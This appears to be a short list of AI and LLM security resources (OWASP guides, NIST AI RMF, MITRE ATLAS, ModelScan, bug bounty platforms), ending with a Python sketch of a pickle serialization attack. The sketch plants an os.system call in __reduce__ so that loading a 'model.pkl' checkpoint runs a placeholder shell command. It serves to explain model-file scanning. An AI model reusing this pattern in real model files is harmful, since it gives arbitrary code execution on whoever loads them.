Practical measures for enterprises to secure AI and LLM adoption, with pragmatic advice for reducing security risks.
Bugcrowd introduces AI Penetration Testing to uncover vulnerabilities in AI systems, including LLM applications, using vetted pentesters.
NIST's AI Risk Management Framework (AI RMF) is a voluntary framework for managing risks associated with artificial intelligence.
Gandalf is a prompting skills test by Lakera that challenges users to extract secret information from a large language model.
Huntr is the first bug bounty platform focused on AI and ML security, rewarding researchers for finding vulnerabilities in open-source AI/ML software and model-related code.
MITRE ATLAS is a knowledge base of adversary tactics and techniques targeting AI systems, helping organizations secure AI deployments.
ModelScan scans ML models for unsafe code, supporting H5, Pickle, and SavedModel formats, to help protect against model serialization attacks (an illustrative example of this attack class follows the list).
OWASP unveils the Gen AI Red Teaming Guide, offering a structured approach to evaluating LLM and Generative AI vulnerabilities.
OWASP Gen AI Security Project provides resources, risk strategies, and global collaboration to secure LLMs, AI agents, and generative AI technologies.
OWASP Machine Learning Security Top 10 (2023) identifies the top 10 security risks for machine learning systems, aimed at developers and security experts.
OWASP Top 10 for LLM Applications 2025 highlights the key security risks in LLM applications, focusing on vulnerabilities and countermeasures.
OWASP Top 10 for Large Language Model Applications educates on security risks in deploying and managing LLMs and Generative AI applications.
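To make the serialization risk that ModelScan scans for more concrete, here is a minimal, self-contained Python sketch of the attack class: a pickle file whose deserialization runs attacker-controlled code. The file name `model.pkl` and the echoed command are illustrative assumptions, and this is not ModelScan's API, only the underlying unsafe-deserialization pattern it is designed to flag.

```python
import os
import pickle


class MaliciousPayload:
    """Illustrative malicious object: pickle invokes __reduce__ at load time,
    so simply deserializing this file executes the attacker's command."""

    def __reduce__(self):
        # Harmless placeholder command; in a real attack this could be anything,
        # which is why untrusted model files are dangerous to load.
        return (os.system, ("echo 'arbitrary code ran at model load time'",))


if __name__ == "__main__":
    # An attacker ships this file as a "model checkpoint".
    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousPayload(), f)

    # A victim (or a framework) loading the checkpoint triggers the command.
    with open("model.pkl", "rb") as f:
        pickle.load(f)
```

Scanning model artifacts such as this one before loading them is exactly the gap tools like ModelScan aim to cover.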